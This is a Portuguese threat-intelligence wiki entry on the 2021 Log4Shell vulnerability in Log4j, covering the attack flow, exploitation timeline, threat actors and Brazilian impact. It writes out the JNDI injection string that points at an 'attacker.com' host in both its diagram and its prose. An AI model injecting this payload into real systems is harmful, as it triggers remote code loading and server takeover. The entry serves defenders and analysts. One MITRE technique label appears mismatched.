2021-12-log4shell - RunkIntel

# Log4Shell (CVE-2021-44228) - Zero-Day Universal (Dezembro 2021) > [!danger] CVSS 10.0 - A Vulnerabilidade do Século > Em 9 de dezembro de 2021, a divulgação pública do **Log4Shell** ([[cve-2021-44228|CVE-2021-44228]]) desencadeou a resposta de segurança mais ampla da história da internet: uma RCE sem autenticação em Log4j - biblioteca Java de logging presente em **bilhões de dispositivos** - com score CVSS 10.0. Dentro de 72 horas, mais de 100 grupos diferentes de atores iniciavam exploração ativa, incluindo APTs estatais, operadores de ransomware e mineradores de criptomoeda. --- ## Attack Flow ```mermaid graph TB A["🌐 Input Controlado pelo Atacante Header HTTP, campo de login parâmetro de URL, User-Agent"] --> B["📝 Log4j Processa Input Interpolação JNDI automática log.info() sem sanitização"] B --> C["🔍 JNDI Lookup ${'{'}<jndi:ldap://attacker.com/a{'}'} Conexão externa disparada"] C --> D["☕ LDAP Server do Atacante Responde com classe Java maliciosa serializada"] D --> E["💥 RCE Imediata Classe Java carregada e executada no servidor"] E --> F["🐚 Reverse Shell / Webshell Acesso interativo ao servidor comprometido"] E --> G["⛏️ Cryptominer XMRig e variantes implantados em massa"] E --> H["🔐 Ransomware / Backdoor Conti, Khonsari, Orcus RAT implantados por APTs"] ``` --- ## Por que Log4j Estava em Tudo O Apache Log4j é uma **biblioteca de logging** open-source para Java - não um produto standalone, mas uma dependência incorporada em práticamente todo software Java enterprise. A vulnerabilidade estava presente em versões 2.0-beta9 a 2.14.1, abrangendo **anos de desenvolvimento**. A natureza ubíqua do Log4j significava que o problema não era "uma empresa vulnerável" - era toda a infraestrutura digital moderna simultâneamente. Entre os produtos afetados: **VMware vCenter, Apache Struts, Minecraft, Steam, Apple iCloud, Amazon AWS, Cisco, Juniper Networks, IBM WebSphere, Oracle Fusion Middleware**, e centenas de SaaS corporativos. O mecanismo de exploração era trivial: basta inserir `${jndi:ldap://attacker.com/exploit}` em qualquer campo que a aplicação logasse via Log4j. Isso incluía campos de username em login, cabeçalhos HTTP User-Agent, campos de pesquisa - qualquer input que chegasse ao servidor. --- ## Exploração em 72 Horas A velocidade da exploração foi sem precedentes na história das vulnerabilidades: | Tempo após divulgação | Evento | |----------------------|--------| | 0h | CVE-2021-44228 publicado no GitHub | | 2h | Primeiros scans em massa detectados (Cloudflare) | | 12h | PoC funcional disponível no Twitter | | 24h | Mais de 40.000 tentativas de exploração/hora (Check Point) | | 48h | APTs estatais (China, Iran, DPRK, Russia) identificados explorando | | 72h | 100+ grupos de ameaça distintos ativos | | 7 dias | Mais de 1,8 milhão de tentativas por hora no pico | A [[cisa]] emitiu **Emergency Directive 22-02** ordenando que todas as agências federais aplicassem patches em 48 horas - prazo extremamente apertado para vulnerabilidades em sistemas de produção. A diretora Jen Easterly chamou Log4Shell de "a more serious vulnerability than any I have seen in my career" - incluindo EternalBlue. --- ## Atores Identificados na Exploração | Ator | Objetivo | Região-alvo | |------|----------|-------------| | [[g0096-apt41]] (China) | Espionagem - acesso inicial | Global - governo e defesa | | [[g0125-silk-typhoon]] (China) | Espionagem persistente | EUA, Europe | | [[g0032-lazarus-group]] (DPRK) | Cryptojacking + espionagem | Global | | Phosphorus / APT35 (Iran) | Ransomware + espionagem | Israel, EUA | | Fancy Bear / [[g0007-apt28]] (Russia) | Reconhecimento | OTAN, governo | | Conti RaaS | Ransomware | Financeiro, saúde | | Grupos de cryptojacking | Mineração XMR | Servidores cloud | --- ## Impacto no Brasil e LATAM O Brasil foi significativamente afetado: o [[cert-br]] emitiu alerta crítico em 10 de dezembro e reportou varreduras ativas em infraestrutura nacional nas primeiras 24 horas. Bancos brasileiros - Bradesco, Itaú, Santander - iniciaram auditorias emergenciais de dependências. Órgãos federais com sistemas Java legados, incluindo plataformas do Serpro, foram objeto de inventário prioritário. A Febraban coordenou resposta setorial no setor financeiro, e o CTIR Gov emitiu alerta formal recomendando varredura imediata em todos os sistemas governamentais. A exploração ativa de Log4Shell no Brasil foi confirmada por múltiplas empresas de segurança, com foco em servidores de e-commerce e sistemas bancários. --- ## Log4Shell em 2026: Ainda Explorável Apesar do patch disponível desde dezembro de 2021, o Log4Shell **continua sendo explorado ativamente em 2026**. Razões: 1. **Shadow IT**: aplicações internas desconhecidas pelo time de segurança 2. **Dependências transitivas**: Log4j incorporado em bibliotecas de terceiros não inventariadas 3. **Sistemas legados**: aplicações críticas sem path de atualização 4. **Containers abandonados**: imagens Docker não atualizadas em produção A CISA mantém Log4Shell no KEV (Known Exploited Vulnerabilities) catalog com data de remediação indefinida - reconhecendo que a exposição é práticamente permanente em escala global. --- ## Variantes e CVEs Relacionados | CVE | Descrição | CVSS | |-----|-----------|------| | [[cve-2021-44228\|CVE-2021-44228]] | Log4Shell - JNDI RCE | 10.0 | | [[cve-2021-45046\|CVE-2021-45046]] | Log4Shell v2 - bypass do patch inicial | 9.0 | | [[cve-2021-45105\|CVE-2021-45105]] | DoS via recursive lookup | 7.5 | | [[cve-2021-44832\|CVE-2021-44832]] | RCE via JDBC appender | 6.6 | --- ## Referências CTI | Elemento | Ligação | |----------|---------| | CVE principal | [[cve-2021-44228\|CVE-2021-44228]] - CVSS 10.0 | | Threat Actors | [[g0096-apt41]], [[g0032-lazarus-group]], [[g0125-silk-typhoon]], [[g0007-apt28]] | | Técnica MITRE | [[T1190]] Exploit Public-Facing Application | | Técnica MITRE | [[T1059.007]] JS/JNDIExploit | | Nota detalhada | [[2021-12-log4shell-disclosure]] | | Evento antecessor | [[2021-05-colonial-pipeline]] | | Evento sucessor | [[2023-05-moveit]] | --- > [!info] Navegação - Eventos Relacionados > [[2021-05-colonial-pipeline]] | [[2023-05-moveit]] | [[cve-2021-44228|CVE-2021-44228]] | [[2021-12-log4shell-disclosure]] | [[_timeline]]